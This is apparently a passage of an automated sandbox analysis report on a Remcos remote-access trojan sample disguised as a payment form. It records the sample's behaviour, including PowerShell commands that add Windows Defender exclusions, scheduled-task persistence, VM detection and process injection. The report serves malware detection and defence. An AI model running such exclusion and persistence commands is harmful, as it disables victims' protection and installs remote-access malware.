              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041A01B
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040B28E
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040838E
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004087A0
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00407848
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004068CD FindFirstFileW,FindNextFileW,9_2_004068CD
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0044BA59 FindFirstFileExA,9_2_0044BA59
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040AA71
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00417AAB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040AC78
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00406D28
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\ProgramData\AppUpdate\remcos.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\AppUpdate\remcos.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\AppUpdate\remcos.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\AppUpdate\remcos.exeThread delayed: delay time: 922337203685477
              Source: remcos.exe, 00000021.00000002.1773191816.0000000007320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-
              Source: remcos.exe, 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.3782308386.0000000001560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1429762645.0000000007520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004327AE
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041A8DA
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004407B5 mov eax, dword ptr fs:[00000030h]9_2_004407B5
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,9_2_00410763
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004327AE
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004328FC SetUnhandledExceptionFilter,9_2_004328FC
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004398AC
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00432D5C
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"Jump to behavior
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeMemory written: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory written: C:\ProgramData\AppUpdate\remcos.exe base: 400000 value starts with: 4D5A
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory written: C:\ProgramData\AppUpdate\remcos.exe base: 400000 value starts with: 4D5A
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory written: C:\ProgramData\AppUpdate\remcos.exe base: 400000 value starts with: 4D5A
              Source: C:\ProgramData\AppUpdate\remcos.exeMemory written: C:\ProgramData\AppUpdate\remcos.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_00410B5C
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004175E1 mouse_event,9_2_004175E1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe C:\ProgramData\AppUpdate\remcos.exe
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCD42.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpED6C.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCDB.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerj
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managert
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`
              Source: remcos.exe, 00000017.00000002.3782308386.0000000001540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004329DA cpuid 9_2_004329DA
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: EnumSystemLocalesW,9_2_0044F17B
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: EnumSystemLocalesW,9_2_0044F130
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: EnumSystemLocalesW,9_2_0044F216
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_0044F2A3
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: GetLocaleInfoA,9_2_0040E2BB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: GetLocaleInfoW,9_2_0044F4F3
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_0044F61C
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: GetLocaleInfoW,9_2_0044F723
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_0044F7F0
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: EnumSystemLocalesW,9_2_00445914
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: GetLocaleInfoW,9_2_00445E1C
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,9_2_0044EEB8
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeQueries volume information: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
